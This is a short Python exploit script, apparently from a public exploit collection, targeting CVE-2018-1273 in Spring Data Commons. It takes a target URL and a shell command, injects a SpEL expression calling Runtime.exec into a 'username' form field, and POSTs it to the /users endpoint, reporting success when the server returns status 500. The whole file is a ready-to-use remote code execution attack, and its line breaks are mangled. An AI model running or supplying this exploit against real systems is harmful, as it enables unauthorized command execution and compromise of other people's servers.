!/usr/bin/python3¶
-- coding:utf-8 --¶
author:zhzyker¶
from:https://github.com/zhzyker/exphub¶
telegram:t.me/zhzyker¶
import requests import sys
if len(sys.argv)!=3: print('+----------------------------------------------------------------------------+') print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +') print('+ Spring Data Commons Remote Code Execution (No display) +') print('+----------------------------------------------------------------------------+') print('+ USE: python3 cve-2018-1273_cmd.py
url = sys.argv[1] cmd = sys.argv[2] vuln = url + "/users"
headers = { 'Host': "localhost:8080", 'Connection': "keep-alive", 'Content-Length': "120", 'Pragma': "no-cache", 'Cache-Control': "no-cache", 'Origin': "http://localhost:8080", 'Upgrade-Insecure-Requests': "1", 'Content-Type': "application/x-www-form-urlencoded", 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", 'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8", 'Referer': "http://localhost:8080/users?page=0&size=5", 'Accept-Encoding': "gzip, deflate, br", 'Accept-Language': "zh-CN,zh;q=0.9,en;q=0.8" }
payload = "username[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('%s')]=&password=&repeatedPassword=" % cmd
try: r = requests.post(vuln, data=payload, headers=headers) if r.status_code == 500: print ("[+] Code executed successfully") else: print ("[-] Target Not CVE-2018-1273 Vuln, Good Luck") except: print ("[-] Target Not CVE-2018-1273 Vuln, Good Luck")